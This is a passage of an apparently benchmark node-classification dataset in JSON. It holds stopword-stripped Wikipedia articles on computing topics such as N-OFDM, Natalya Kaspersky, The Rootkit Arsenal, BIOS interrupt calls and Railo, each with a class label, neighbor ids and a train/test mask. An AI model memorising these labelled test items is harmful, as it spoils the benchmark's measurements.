    "text": "Non-orthogonal_frequency-division_multiplexing:non-orthogonal frequency-division multiplexing non-orthogonal frequency-division multiplexing n-ofdm method encoding digital data multiple carrier frequencies non-orthogonal intervals frequency sub-carriers low-pass equivalent n-ofdm signal expressed formula_2 data symbols formula_3 number sub-carriers formula_4 n-ofdm symbol time sub-carrier spacing formula_5 formula_6 makes non-orthogonal symbol period section describes simple idealized n-ofdm system model suitable time-invariant awgn channel n-ofdm carrier signal sum number not-orthogonal subcarriers baseband data subcarrier independently modulated commonly using type quadrature amplitude modulation qam phase-shift keying psk composite baseband signal typically used modulate main rf carrier formula_7 serial stream binary digits inverse multiplexing first demultiplexed formula_8 parallel streams one mapped possibly complex symbol stream using modulation constellation qam psk etc. note constellations may different streams may carry higher bit-rate others digital signal processor dsp computed set symbols giving set complex time-domain samples samples quadrature-mixed passband standard way real imaginary components first converted analogue domain using digital-to-analogue converters dacs analogue signals used modulate cosine sine waves carrier frequency formula_9 respectively signals summed give transmission signal formula_10 receiver picks signal formula_11 quadrature-mixed baseband using cosine sine waves carrier frequency also creates signals centered formula_12 low-pass filters used reject baseband signals sampled digitised using analog-to-digital converters adcs forward fft used convert back frequency domain returns formula_8 parallel streams use appropriate symbol detector 1st method optimal processing n-ofdm signals fft proposed 1992 combination n-ofdm mimo technology similar ofdm fast-ofdm method proposed 2002 fbmc filter-bank multi-carrier modulation example fbmc consider wavelet n-ofdm n-ofdm become technique power line communications plc area research wavelet transform introduced replace dft method creating non-orthogonal frequencies due advantages wavelets offer particularly useful noisy power lines create sender signal wavelet n-ofdm uses synthesis bank consisting formula_14-band transmultiplexer followed transform function receiver side analysis bank used demodulate signal bank contains inverse transform followed another formula_14-band transmultiplexer.\\ relationship transform functions n-ofdm spectrally efficient method sefdm methods similar n-ofdm gfdm generalized frequency division multiplexing",
    "neighbors": [
      3040,
      1121,
      5664,
      7490,
      3140,
      7108,
      8160,
      11686,
      2920,
      7400,
      10381,
      1550,
      2994,
      2968,
      1977,
      5020,
      5304
    ],
    "mask": "None"
  },
  {
    "node_id": 5305,
    "label": 4,
    "text": "Natalya_Kaspersky:natalya kaspersky natalya ivanovna kasperskaya born 5 february 1966 moscow soviet union -- west uses surname masculine form kaspersky —is russian entrepreneur president 'infowatch group companies co-founder former ceo antivirus security software company 'kaspersky lab addition one wealthiest women russia one influential figures russian industry natalya kasperskaya maiden name stutser born 5 february 1966 moscow family engineers soviet defense research institute employees natalya elected member school pioneer council later member district pioneer headquarters also komsomol member organizer alongside main education natalya also played basketball children youth sports school seriously intended become veterinarian giving dream difficulties studying chemistry eighth year education natalya moved ordinary secondary school physics-mathematical school run moscow aviation institute finishing school natalya took entrance exams lomonosov moscow state university enrolled missing half point however results good enough gain entry moscow institute electronics mathematics 1984 1989 natalya studied applied mathematics moscow institute electronics mathematics topic diploma mathematical model nuclear reactor cooling system later earned bachelor degree open university uk studies moscow institute met first husband eugene kaspersky married 1986 graduating institute natalya assigned central scientific construction bureau moscow worked half year research scientist going maternity leave natalya started career age 28 took job january 1994 salesperson computer accessories software firm 50-dollar monthly salary job based newly opened store kami information technologies center created former professor natalya ex-husband eugene kaspersky higher school kgb soviet epoch believes personal data search history geolocation contacts correspondence photo video materials belong state september 1994 natalya became head distribution department antiviral toolkit pro avp development eugene kaspersky team since 1991 two three years natalya successfully built distribution channels technical support network entered international markets sales growing rapidly initial 100–200 per month 1994 130,000 year 600,000 1996 1 million 1997 revenue divided team mother company 1997 future founders 'kaspersky lab decided start business natalya launched kaspersky lab foundation june 1997 key naming new company worked ceo 10 years shares 'kaspersky lab initially split eugene kaspersky 50 two teammate programmers alexey de-monderik vadim bogdanov 20 natalya kasperskaya 10 1997 kaspersky lab sales started double yearly turnover reaching around 7 million 2001 exceeding 67 million 2006 august 2007 natalya unseated suspended key management functions eugene kaspersky due couple divorce deepening ideological divide two eventually natalya agreed stay chairperson newly established board 'kaspersky lab finally breaking ties previously family driven business 2011 kaspersky lab buying natalya stake company 2007 2011 around 30 shares 2007 natalya supervision kaspersky lab turned leading antivirus corporation network regional offices worldwide moment power change 2007 annual sales revenue reached 126 million company estimated capitalization 1.3 billion yearly revenue 700 million 2011 natalya sold remaining stake departed change management company rate growth dropped visibly global revenue growing 40 2009 13.7 2011 3 2012 6 2013 'kaspersky lab bought antispam technology developed 'ashmanov partners head latter igor ashmanov gave buyer idea use antispam engine backwards protection data leaks 2001—2002 'kaspersky lab programmers developed solution later became known infowatch traffic monitor enterprise offers protection corporate users internal threats dlp system december 2013 subsidiary called 'infowatch established develop distribute new software natalya kasperskaya ceo majority owner 'infowatch since october 2007 stake company linked business separation deal ex-husband natalya made main investments 'infowatch 'kribrum 'nanosemantics co-owned igor ashmanov g data software ag german antivirus company 'infowatch software vague prospects time spin-off albatross around 'kaspersky lab neck unlike 'kaspersky lab technological solutions product line new company initially targeted large medium enterprises starting 300 workstations rather small businesses retailers required fundamentally different skill set approach natalya previous experience management turning particularly relevant nevertheless 2012 infowatch previously unprofitable recorded first earnings went growing annual rate 60—70 according 'forbes infowatch annual revenue reached around 12 million 2015 independent experts polled russian daily newspaper 'kommersant spring 2015 estimating business worth 40–50 million today infowatch group companies working two main business areas — corporate protection internal threats external targeted attacks — company holding almost 50 share russian confidential data protection market dlp systems among longstanding clients russian governmental organizations well 'sberbank 'beeline lukoil 'tatneft 'surgutneftegas 'sukhoi 'magnitogorsk iron steel works etc addition infowatch actively developing german middle east south-east asian markets current infowatch shareholders natalya kasperskaya company deputy ceo rustem khairetdinov according forbes natalya kasperskaya fortune around 220 million march 2013 – estimate increased 230 million 2014 270 million 2015 march 2015 russian news portal 'lenta.ru agreed forbes ’ 2014 estimation july 2015 german magazine 'der spiegel published estimation €207 million finally august year women magazine 'cosmopolitan published estimate 270 million according 'der spiegel majority natalya kasperskaya fortune form funds derived asset sales kaspersky october 2015 response question whether 'forbes calculations accurate emphasized company non-public thus need reveal level capitalization adding “ nevertheless good see people seem appreciate value 'infowatch ” natalya kasperskaya member board russian union industrialists entrepreneurs association software developers 'domestic software also member expert russian software council affiliated ministry telecom mass communications russia grant committee skolkovo foundation supervisory board skolkovo institute science technology skoltech furthermore natalya kasperskaya member russian mechanical engineering union association information protection business information security association bisa april 2008 march 2012 natalya member board addition 2009 2011 head working party information computer technologies federal target program ministry education science russia referred “ research inventions priority scientific technology development areas russia 2014—2020 ” natalya kasperskaya enjoyed participating social activities ever since school remembers singing children choir taking part school performances concerts even leading pioneer team agitators addition formed school placard newspaper wrote poetry also interested sports like basketball skiing swimming well phaleristics collecting stamps soviet coins student natalya fascinated moscow theatre life knew repertoires main youth theatres time mossovet theatre taganka theatre sovremennik etc. sometimes queued overnight buy tickets popular performances furthermore also passion guitar poetry often sang played guitar parties natalya interest trekking skiing travelling friends children reading professional literature came later considers good great written american business consultant jim collins favorite books saying influenced outlook addition also speaks english german fluently kasperskaya admits little interest cooking although cook family maternity leave similarly also particular interest fashion clothing brands waste much time shopping instead buying whatever clothes finds suit style addition natalya fan designer brands since knows clothes actually produced natalya perceives gadgets social networks somewhat negatively understands provide capabilities increased surveillance regularly use work sony xperia phone natalya typically allows pr team manage social network presence uses media rarely natalya met first husband eugene kaspersky health resort january 1987 twenty couple marrying six months later 1989 fifth year institute natalya gave birth first son maxim second son ivan following 1991 couple split 1997 divorced 1998 eugene instigation however due joint rapidly growing business divorce covered couple years order demotivate employees panic market natalya met second husband igor ashmanov 1996 cebit computer expo hannover working neighboring stands year later natalya igor renewed acquaintance started communicating one another regularly professional basis natalya kasperskaya remembers started dating two three years later divorce eugene couple deciding marry 2001 2005 igor natalya daughter alexandra followed second daughter maria 2009 third daughter varvara 2012 natalya sons first marriage studied lomonosov moscow state university maxim graduating faculty geography ivan faculty computational mathematics cybernetics april 2011 natalya 20-year-old son ivan kidnapped strogino district moscow way work perpetrators holding one villages sergievo-posadsky subregion moscow oblast suburb demanding ransom €3 million parents however five days later ivan freed thanks actions russian intelligence services five kidnappers including two repeat offenders sentenced prison terms ranging 4.5 11 years",
    "neighbors": [
      7809,
      2213,
      10245,
      9488,
      3955,
      2005,
      4475,
      6431
    ],
    "mask": "Test"
  },
  {
    "node_id": 5306,
    "label": 4,
    "text": "The_Rootkit_Arsenal:rootkit arsenal rootkit arsenal escape evasion dark corners system book written bill blunden published jones bartlett publishers may 2009 book takes reader depth rootkit technology uses covers topics ia-32 assembly windows system architecture kernel debugging advanced rootkit development much concerning rootkit technology applied onto e.g white hat hacking book also provides many source code examples rootkit development properly use required recommended fair understanding computer programming operating systems order fully comprehend contents book back cover states advanced book topic book divided four parts 14 chapters goes detail specific technology information required advanced rootkit development use also provides information network file system analysises kernel objects drivers much related rootkit technology reader create fully working rootkit using source codes appendix product description states book sheds light material traditionally poorly documented partially documented intentionally undocumented book received mostly positive reviews websites specializing computer reviews computing reviews writes book book addresses controversial timely issue field network security rootkits notoriously used black hat hacking community rootkit allows attacker subvert compromised system subversion take place application level case early rootkits replaced set common administrative tools dangerous occurs kernel level rootkit hides network traffic processes files attacker decides keep invisible administrators system management tools… work defensive solutions—anti-virus malware detection tools—or interested low-level system programming must read book fact intended audience one best books 2009 richard austin ieee computer society technical committee security privacy also published review book second edition 2014",
    "neighbors": [
      5380,
      6797,
      7983,
      477,
      2430,
      9791
    ],
    "mask": "Train"
  },
  {
    "node_id": 5307,
    "label": 7,
    "text": "EMBRACE:embrace embrace european model bioinformatics research community education project year 2005 2010 objective drawing together wide group experts throughout europe involved use information technology biomolecular sciences embrace network worked integrate major databases software tools bioinformatics using existing methods emerging grid service technologies integration efforts driven set test problems representing key issues bioinformatics service providers end-user biologists result groups throughout europe able use embrace service interfaces local proprietary data tools embrace made many bioinformatics web services available international research community project run ebi hinxton england fred marcus eu project coordinator embrace project funded european commission within fp6 programme thematic area life sciences genomics biotechnology health contract number lhsg-ct-2004-512092",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5308,
    "label": 4,
    "text": "Samuel_C._Phillips:samuel c. phillips general samuel cochran phillips february 19 1921 – january 31 1990 united states air force four-star general served director nasa apollo manned lunar landing program 1964 1969 seventh director national security agency 1972 1973 commander air force systems command 1973 1975 phillips born springerville arizona february 19 1921 attended public schools cheyenne wyoming graduating cheyenne high school 1938 earned bachelor science degree electrical engineering university wyoming 1942 master science degree electrical engineering university michigan 1950 member kappa sigma fraternity summer break 1940 earned private pilot license phillips commissioned second lieutenant infantry completion reserve officers training corps training graduation university wyoming entered active military service transferred army air corps attended flying school earned pilot wings world war ii phillips served combat pilot 364th fighter group eighth air force based england completed two combat tours duty european theater operations awarded distinguished flying cross oak leaf clusters air medal seven oak leaf clusters french croix de guerre war assigned european theater headquarters frankfurt germany july 1947 phillips transferred langley air force base virginia phillips research development assignments included six years engineering division wright-patterson air force base ohio duty electronics officer nuclear weapons experiments eniwetok atoll operation greenhouse project officer assignments b-52 stratofortress heavy bomber aim-4 falcon air-to-air missile bomarc surface-to-air missile programs phillips returned england 1956 served 7th air division strategic air command participation negotiating completing international agreement united kingdom deployment use american thor nuclear-armed intermediate-range ballistic missile irbm latter assignment earned phillips legion merit medal phillips returned united states 1959 assigned air force ballistic missile division air research development command los angeles california director minuteman intercontinental ballistic missile program icbm 1963 nasa associate administrator manned space flight george e. mueller admired phillips skill managing minuteman air force projects proposed bringing nasa detached military duty program controller manned space flight phillips air force superior agreed condition phillips hired instead director apollo manned lunar landing program december accomplished phillips assigned nasa time achieved rank major two-star general phillips aggressively took job constant daily meetings phone contact visits contractor sites kept road 75 per cent time described job new york times reporter john noble wilford way november 1965 phillips took team north american aviation downey california prime contractor command/service module also saturn v launch vehicle s-ii second stage investigate problems delays quality shortfalls cost overruns december 19 wrote memo naa president lee atwood copy report findings recommended fixes also sent mueller mueller also sent atwood follow-on letter strongly expressing disappointment csm s-ii problems requiring response end january 1966 follow-on visit phillips team march apollo 1 fire killed three astronauts ground test january 27 1967 first manned apollo mission congressional investigation uncovered existence came known phillips report nasa administrator james e. webb called congress testified unaware existence report ignited congressmen senators criticism nasa selection north american contractor however political support president lyndon b. johnson controversy blew next eighteen months apollo got back track toward manned missions goal first lunar landing 1970 small dinner party launch apollo 10 may 1969 dr. wernher von braun director marshall space flight center huntsville ala. praised general phillips one responsible pulling many pieces apollo program together making work time apollo 11 mission july 1969 achieved program manned landing goal phillips announced intention leave nasa return air force duty nasa service promoted lieutenant general september 1969 phillips placed command space missile systems organization samso air force systems command afsc los angeles august 1972 phillips appointed director national security agency dirnsa also chief central security service two years positions phillips assigned commander air force systems command august 1973 andrews air force base maryland retired air force 1975 general phillips fellow institute electrical electronics engineers member american institute aeronautics astronautics selected fellowship organization october 1969 notable valuable contributions sciences technology addition phillips fellow american astronautical society honorary member national business fraternity alpha kappa psi member board governors national space club member board directors united services automobile association president military benefit association phillips awarded air force distinguished service medal september 1969 service nasa july 1972 service commander samso phillips also awarded two nasa distinguished service medals agency 1968 1969 distinguished contributions apollo program phillips held honorary doctor laws degree university wyoming september 26 1971 phillips awarded smithsonian institution langley gold medal aviation space exploration contributions apollo program 1964 1969 14th recipient langley medal since award first presented wright brothers 1909 april 1971 gen. phillips elected member national academy engineering leadership direction minuteman missile program apollo program phillips received general thomas d. white u.s. air force space trophy september 11 1972 also flying tiger pilot trophy awarded american volunteer group july 7 1973 phillips married betty anne phillips three daughters phillips initiated scottish rite freemasonry till 33rd highest degree becoming past master four scottish rite bodies dallas active member supreme council office sovereign grand inspector general scottish rite masons texas.. phillips died cancer palos verdes california january 31 1990 aged 68",
    "neighbors": [
      6017,
      8726,
      1189,
      9517,
      1838,
      1986,
      6343,
      6344,
      11335,
      7119,
      7759,
      7887,
      3154,
      8276,
      7893,
      991,
      7137,
      3305,
      7145,
      2419,
      6005,
      6136,
      766
    ],
    "mask": "Test"
  },
  {
    "node_id": 5309,
    "label": 3,
    "text": "Goldmont:goldmont goldmont microarchitecture low-power atom celeron pentium branded processors used systems chip socs made intel apollo lake platform 14 nm goldmont core unveiled intel developer forum idf shenzhen china april 2016 goldmont architecture borrows heavily skylake core processors offers 30 percent performance boost compared previous braswell platform used implement power-efficient low-end devices including cloudbooks 2-in-1 netbooks small pcs ip cameras in-car entertainment systems goldmont 2nd generation out-of-order low-power atom microarchitecture designed entry level desktop notebook computers goldmont built 14 nm manufacturing process supports four cores consumer devices includes intel gen9 graphics architecture introduced skylake goldmont microarchitecture builds success silvermont microarchitecture provides following enhancements similar previous silvermont generation design flaws found processor circutry resulting cease operation processors actively used several years errata named apl46 system may experience inability boot may cease operation added documentation june 2017 stating low pin count real time clock sd card gpio interfaces may stop functioning mitigations found limit impact systems firmware update lpc bus called lpc_clkrun reduces utilization lpc interface turn decreases eliminates lpc bus degradation systems however compatible new firmware recommended use sd card boot device remove card system use possible solution using uhs-i cards operating 1.8v congatec also states issues impact usb buses emmc although mentioned intel public documentation usb maximum 12 active time 60tb transmit traffic life expectancy lifetime port emmc maximum 33 active time set d3 device low power state operating system use newer designs atom c3000 denverton seem affected list desktop processors follows list mobile processors follows list embedded processors follows also atom a3900 series exclusively automotive customers aec-q100 qualification willow trail platform canceled apollo lake offered instead",
    "neighbors": [
      3459,
      5380,
      3973,
      8325,
      9095,
      5386,
      9611,
      4108,
      9741,
      398,
      6926,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      5883,
      6815,
      2088,
      10669,
      9391,
      10675,
      4276,
      1461,
      10548,
      2237,
      8125,
      8126,
      6339,
      5444,
      9541,
      1998,
      2638,
      977,
      5073,
      5844,
      8795,
      4444,
      7134,
      1119,
      1122,
      1000,
      7657,
      4204,
      5356,
      8684,
      5871,
      9582,
      10734,
      499,
      8820,
      3317,
      4217,
      4603,
      10620,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 5310,
    "label": 4,
    "text": "Solomon_Kullback:solomon kullback solomon kullback april 3 1907august 5 1994 american cryptanalyst mathematician one first three employees hired william f. friedman us army signal intelligence service sis 1930s along frank rowlett abraham sinkov went long distinguished career sis eventual successor national security agency nsa kullback chief scientist nsa retirement 1962 whereupon took position george washington university kullback–leibler divergence named kullback richard leibler kullback born jewish parents brooklyn new york attended boys high school went city college new york graduating ba 1927 math 1929 completed doctorate math george washington university 1934 intention teach returned boy high school found taste discovered real interest using mathematics teaching suggestion abraham sinkov showed civil service flyer junior mathematicians us 2,000 per year took examination passed assigned washington junior cryptanalysts upon arrival washington kullback assigned william f. friedman friedman begun intensive program training cryptology new civilian employees several summers running sis cryptanalysts attended training camps fort meade received commissions reserve officers army kullback sinkov took friedman admonitions education seriously spent next several years attending night classes received doctorates mathematics afterward kullback rediscovered love teaching began offering evening classes mathematics george washington university 1939 completed training three put work actually hired compilations cipher code material u.s. army another task test commercial cipher devices vendors wished sell u.s. government kullback worked partnership frank rowlett red cipher machine messages almost overnight unravelled keying system machine pattern – nothing intercepted messages hand using talents linguist john hurt translate text sis started issuing current intelligence military decision-makers may 1942 five months pearl harbor kullback major sent britain learned bletchley park british producing intelligence high quality exploiting enigma machine also cooperated british solution conventional german codebook-based systems shortly return states kullback moved japanese section chief national security agency nsa formed 1952 rowlett became chief cryptanalysis primary problem facing research development post-war period development high-speed processing equipment kullback supervised staff 60 including innovative thinkers automated data processing development leo rosen sam snyder staff pioneered new forms input memory magnetic tape drum memory compilers make machines truly multi-purpose kullback gave priority using computers generate communications security comsec materials kullback book information theory statistics published john wiley sons 1959 book republished additions corrections dover publications 1968 solomon kullback retired nsa 1962 focused teaching george washington university publishing new papers 1963 elected fellow american statistical association reached rank colonel inducted military intelligence hall fame kullback remembered colleagues nsa straightforward one described totally guileless always knew stood one former nsa senior recalled man unlimited energy enthusiasm man whose judgment usually sound right",
    "neighbors": [
      11397,
      4007,
      6572,
      173,
      7887,
      6578,
      1941,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 5311,
    "label": 9,
    "text": "John_Resig:john resig john resig american software engineer entrepreneur best known creator lead developer jquery javascript library resig graduated undergraduate degree computer science rochester institute technology 2005 time worked ankur teredesai data mining instant messaging networks jon schull exploring new ways encouraging real-time online collaboration currently works application developer khan academy previously javascript tool developer mozilla corporation work jquery inducted rochester institute technology innovation hall fame april 30 2010 resig started contributed many javascript libraries including resig frequent guest speaker companies like google yahoo presented many conferences related web technology including sxsw webstock mix tech4africa resig author widely read blog author book pro javascript techniques published apress 2006 secrets javascript ninja bear bibeault published manning publications december 2012 several papers",
    "neighbors": [
      1409,
      259,
      8068,
      3462,
      6791,
      1802,
      6154,
      10507,
      8854,
      4378,
      8605,
      7455,
      8735,
      1698,
      803,
      3761,
      1203,
      11060,
      438,
      4920,
      1470,
      7871,
      2880,
      9152,
      4171,
      11087,
      339,
      84,
      4056,
      9560,
      9561,
      603,
      8289,
      482,
      5219,
      7396,
      487,
      5483,
      9195,
      5101,
      10991,
      10097,
      10744,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 5312,
    "label": 3,
    "text": "BIOS_interrupt_call:bios interrupt call bios interrupt calls facility operating systems application programs use invoke facilities basic input/output system ibm pc compatible computers traditionally bios calls mainly used dos programs software boot loaders including mostly historically relatively simple application software boots directly runs without operating system—especially game software bios runs real address mode real mode x86 cpu programs call bios either must also run real mode must switch protected mode real mode calling bios switch back reason modern operating systems use cpu protected mode generally use bios support system functions although use bios probe initialize hardware resources early stages booting computers software instructions control physical hardware screen disk keyboard etc moment power switched pc bios pre-loaded rom main board takes control immediately processor reset including power-up hardware reset button pressed bios initializes hardware finds loads runs boot program usually necessarily os loader provides basic hardware control operating system running machine usually operating system may directly booting single software application ibm part provided information needed use bios fully directly utilize hardware avoid bios completely programming early ibm pc models prior ps/2 beginning programmers choice using bios per-hardware-peripheral basis today bios new pc still supports bios interrupt function calls defined ibm ibm introduced 1984 along many newer ones plus extensions originals e.g expanded parameter ranges combined similar degree hardware compatibility means programs written ibm still run correctly new pc today assuming faster speed execution acceptable typically games use cpu-based timing despite considerable limitations services accessed bios interrupts proven extremely useful durable technological change bios interrupt calls perform hardware control i/o functions requested program return system information program key element purpose bios calls abstraction bios calls perform generally defined functions specific details functions executed particular hardware system encapsulated bios hidden program example program wants read hard disk need know whether hard disk ata scsi sata drive earlier days esdi drive mfm rll drive perhaps seagate st-506 controller perhaps one several western digital controller types different proprietary controller another brand program needs identify number drive wishes access address sector needs read write bios take care translating general request specific sequence elementary operations required complete task particular disk controller hardware connected drive program freed needing know control low level every type hard disk display adapter port interface real-time clock peripheral may need access makes programming operating systems applications easier makes programs smaller reducing duplication program code functionality included bios need included every program needs relatively short calls bios included instead operating systems bios used service calls provided operating system generally fulfill function purpose bios also frees computer hardware designers extent programs written use bios exclusively constrained maintain exact hardware compatibility old systems designing new systems order maintain compatibility existing software example keyboard hardware ibm pcjr works differently keyboard hardware earlier ibm pc models programs use keyboard bios difference nearly invisible good example side issue significant share pc programs use time pcjr introduced use keyboard bios exclusively ibm also included hardware features pcjr emulate way original ibm pc ibm pc xt keyboard hardware works hardware emulation exact programs try use keyboard hardware directly work correctly pcjr programs use bios keyboard services addition giving access hardware facilities bios provides added facilities implemented bios software example bios maintains separate cursor positions eight text display pages provides tty-like output automatic line wrap interpretation basic control characters carriage return line feed whereas cga-compatible text display hardware one global cursor automatically advance cursor interpret control characters operating systems software communicates bios software order control installed hardware via software interrupts software interrupt specific variety general concept interrupt interrupt mechanism cpu directed stop executing main-line program immediately execute special program called interrupt service routine isr instead isr finishes cpu continues main program x86 cpus isr call interrupt occurs found looking table addresses called interrupt vectors memory interrupt invoked type number 0 255 type number used index table address found table address isr run response interrupt software interrupt simply interrupt triggered software command therefore software interrupts function like subroutines main difference program makes software interrupt call need know address isr interrupt number advantages modularity compatibility flexibility system configuration bios interrupt calls thought mechanism passing messages bios operating system bios client software messages request data action bios return requested data status information and/or product requested action caller messages broken categories interrupt number categories contain sub-categories called functions identified function numbers bios client passes information bios cpu registers receives information back way data large fit registers tables control parameters disk sector data disk transfers passed allocating buffer i.e space memory passing address buffer registers sometimes multiple addresses data items memory may passed data structure memory address structure passed bios registers interrupt number specified parameter software interrupt instruction intel assembly language int instruction function number specified ah register caller sets ah register number desired function general bios services corresponding interrupt number operate independently functions within one interrupt service handled bios program independent last point relevant reentrancy bios software usually returns caller error code successful status code and/or requested data successful data small one bit large 65,536 bytes whole raw disk sectors maximum fit one real-mode memory segment bios expanded enhanced years many times many different corporate entities unfortunately result evolution bios functions called use consistent conventions formatting communicating data reporting results bios functions report detailed status information others may even report success failure return silently leaving caller assume success test outcome way sometimes also difficult determine whether certain bios function call supported bios certain computer limits call parameters computer bios interrupt calls use cpu register-based parameter passing calls oriented made assembly language directly made high-level languages hlls however high level language may provide library wrapper routines translate parameters form usually stack-based used high-level language register-based form required bios back hll calling convention bios returns variants c bios calls made using inline assembly language within c module support inline assembly language part ansi c standard language extension therefore c modules use inline assembly language less portable pure ansi standard c modules invoking interrupt done using int x86 assembly language instruction example print character screen using bios interrupt 0x10 following x86 assembly language instructions could executed list common bios interrupt classes found note bioses particularly old ones implement interrupt classes bios also uses interrupts relay hardware event interrupts programs choose receive route messages use table includes bios interrupts intended called programs using int assembly-language software interrupt instruction request services information traditionally jumped implementation cassette basic provided microsoft stored option roms call would typically invoked bios unable identify bootable disk volumes startup time original ibm pc ibm machine type 5150 released 1981 basic rom key feature contemporary popular personal computers commodore 64 apple ii line also microsoft cassette basic rom though commodore renamed licensed version commodore basic substantial portion intended market ibm pc needed basic compete systems ibm pc rom basic served primitive diskless operating system allowing user load save run programs well write refine original ibm pc also pc model ibm like aforementioned two competitors included cassette interface hardware base model ibm pc 16 kib ram disk drives kind cassette interface basic rom essential make base model usable five 8 kib rom chips original ibm pc totaling 40 kib four contain basic one contains bios rom basic accounts half total system memory 4/7ths precise time went basic longer shipped pcs interrupt would simply display error message indicating bootable volume found famously rom basic explanatory messages later bios versions bios versions would prompt user insert bootable volume press key user pressed key would loop back bootstrap loader int 19h try booting digital rainbow 100b used call bios incompatible ibm bios turbo pascal turbo c turbo c++ repurposed int 18 memory allocation paging programs also reused vector purposes dos systems io.sys ibmbio.com hooks int 13 floppy disc change detection tracking formatting calls correcting dma boundary errors working around problems ibm rom bios 01/10/84 model code 0xfc first call many modern operating systems linux newer versions windows bypass built-in bios interrupt communication system altogether preferring use software control attached hardware directly original reason primarily operating systems run processor protected mode whereas calling bios requires switching real mode back switching real mode slow however also serious security reasons switch real mode bios code limitations functionality speed motivate operating system designers find replacement fact speed limitations bios made common even dos era programs circumvent order avoid performance limitations especially video graphics display fast serial communication problems bios functionality include limitations range functions defined inconsistency subsets functions supported different computers variations quality bioses i.e bioses complete reliable others abridged buggy taking matters hands avoiding reliance bios operating system developers eliminate risks complications face writing supporting system software hand developers become responsible providing bare-metal driver software every different system peripheral device intend operating system work inducing hardware producers provide drivers thus apparent compact operating systems developed small budgets would tend use bios heavily large operating systems built huge groups software engineers large budgets would often opt write drivers instead using bios—that even without considering compatibility problems bios protected mode",
    "neighbors": [
      389,
      5000,
      8590,
      7188,
      8345,
      7983,
      8625,
      823,
      7099,
      7501,
      5457,
      11601,
      10839,
      5080,
      4441,
      477,
      2019,
      6118,
      1515,
      8301,
      6129,
      9330,
      499,
      11634,
      3445,
      2811,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 5313,
    "label": 4,
    "text": "Back_in_Time_(Linux_software):back time linux software back time backup application linux versions integrate favorably gnome kde sc 4 available directly repositories many linux distributions released terms gnu general public license gpl free software back time uses rsync backend characteristic feature using hard links files identical snapshots different times thus using disk space files remained unchanged possible use several backup profiles e.g backups different hard disks also create schedules symbolic links backed absolute relative ones hard links treated due used backup method back time also supports encryption backups backup ssh advantages hard link method easy look snapshots system different times also easy remove old snapshots compared incremental backup methods save difference information consecutive backup times however drawback back time allow compression requires file systems support hard links backup location graphical interface written qt",
    "neighbors": [
      9025,
      6280,
      5482,
      8554,
      1358,
      7983,
      5969,
      1844,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 5314,
    "label": 9,
    "text": "Railo:railo railo server commonly referred railo open source software implements general-purpose cfml server-side scripting language often used create dynamic websites web applications intranet systems cfml dynamic language supporting multiple programming paradigms runs java virtual machine jvm railo created swiss company railo technologies gmbh intended high performance alternative adobe coldfusion 2008 railo switched open source community-driven model became jboss project railo open source project led railo technologies development work funded consulting support contracts anyone may contribute code consideration railo named alien dog star trek enterprise dog actually named rhylo written phonetically german railo thus railo pronounced either rhy-lo rai-lo acceptable railo major releases codename notable loyal dogs history railo began 2002 student project compile cfml code php choice made due ubiquity php however found give desired performance stability decision made switch java platform instead project successful enough decided continue develop full product several alpha beta releases made official 1.0 release april 2006 railo continued developed relatively unknown many cfml developers june 2008 scotch rocks conference edinburgh railo technologies used day 2 keynote announce partnership jboss switch open source may 2012 cf objective conference foundation railo company ltd announced private limited company comprising swiss company railo technologies gmbh conjunction five companies operated cfml industry 29 january 2015 lucee project fork railo 4.2 codebase announced original developer railo stated would working railo developers confirmed also focusing solely lucee although official statement made railo company community consensus development railo project unlikely 19 july 2016 railo company dissolved railo runs jvm servlet work servlet container e.g apache tomcat eclipse jetty application server e.g jboss glassfish possible connect web server e.g apache iis nginx cherokee front using connectors mod jk mod proxy equivalent required railo railo installer linux macos windows bundles apache tomcat also pre-configured railo express download using jetty v4.0 onwards railo command line version enabling cfml used general-purpose language outside servlet environment railo since v3.1 licensed lgpl v2.1 source code available github primary aim railo provide functionality coldfusion using less resources giving better performance railo technologies team continue treat slowness bug core development philosophy many performance tests shown railo perform faster cfml engines addition railo attempts resolve many inconsistencies found traditional cfml either forced changes behaviour configurable options railo administrator railo technologies team always open feedback active cfml community events keen remind people railo community project railo technologies also creates strong technology partnerships cfml software companies including blue river interactive group developers mura cms contens software gmbh developers contens cms intergral gmbh developers fusionreactor fusiondebug help ensure software works well railo addition railo technologies offer formal partner programs solutions development hosting training railo application server currently averages 7,000 downloads growing per month railo used number companies notably including cfml built-in functionality preventing code injection via codice_10 tag functions codice_11 codice_12 codice_13 also third-party cfml implementations owasp enterprise security api antisamy project one key architecture decisions railo follow jee servlet model support multiple independent web contexts single server key security factor prevents unrelated applications interfering may happen shared coldfusion server single web context railo implements cfml language see cfml syntax section examples well cfscript cfml tag-based syntax visually different languages though aside similar dynamic languages following exceptions whilst railo implements cfml generally compatible adobe coldfusion acf original cfml engine notable differences two",
    "neighbors": [
      2304,
      2946,
      3469,
      9618,
      148,
      4507,
      4512,
      6819,
      8739,
      3237,
      10020,
      5677,
      7983,
      4529,
      9780,
      7862,
      1591,
      3895,
      823,
      5048,
      9144,
      1468,
      9666,
      8644,
      6860,
      9293,
      1363,
      11221,
      4439,
      3545,
      11097,
      479,
      225,
      865,
      102,
      7274,
      5872,
      10994,
      5492,
      9467
    ],
    "mask": "None"
  },
  {
    "node_id": 5315,
    "label": 0,
    "text": "Kaldi_(software):kaldi software kaldi speech recognition toolkit freely available apache license kaldi aims provide software flexible extensible supports linear transforms mmi boosted mmi mce discriminative training feature-space discriminative training deep neural networks kaldi incorporated part chime speech separation recognition challenge several successive events software initially developed part 2009 workshop johns hopkins university",
    "neighbors": [
      1890,
      6797,
      7983,
      5492,
      11221,
      823,
      10557,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 5316,
    "label": 9,
